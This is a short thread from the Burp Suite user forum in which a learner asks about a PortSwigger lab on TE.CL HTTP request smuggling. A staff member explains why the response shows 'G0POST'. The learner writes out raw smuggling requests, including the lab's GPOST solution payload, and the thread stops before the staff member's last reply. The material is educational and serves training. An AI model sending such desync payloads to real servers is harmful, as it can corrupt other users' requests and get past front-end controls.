Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

"Lab: HTTP request smuggling, basic TE.CL vulnerability" need help in understanding

Anton | Last updated: Feb 17, 2020 03:15PM UTC

Hello, I'm trying to figure out what is going on under the hood but with no luck so far. Trying following as a possible solution I don't understand why the Response is "Unrecognized method G0POST" Why there is a zero before "POST" Request: POST / HTTP/1.1 Host: ac2f1f0e1ea3d02180733e8600de008b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-length: 3 1 G 0 I appreciate any help. Thanks.

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 03:53PM UTC

Because your content-length is 3, that means that your first request stops after the "1". The following characters are prepended to the next post request. When the next request is sent, the G and 0 are prepended to the POST. This is why it will come up with G0POST. Have you had a look at the solution for the lab you are trying to complete? The TE.CL solution request looks significantly different to your request.

Anton | Last updated: Feb 17, 2020 04:15PM UTC

Yes, I solved the lab with solution provided in the lab. I guess I see what is going on there. Correct me please if my understanding is wrong. Request: ... Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ----------------- Content-length: 4 - that means that "5c\r\n" that first request stops right after this blob. GPOST / HTTP/1.1 - instead of prepending "G" to "POST" (that I wast trying to achieve) it explicitly issues a GPOST request. Does it sound right?

Hannah, PortSwigger Agent | Last updated: Feb 17, 2020 04:33PM UTC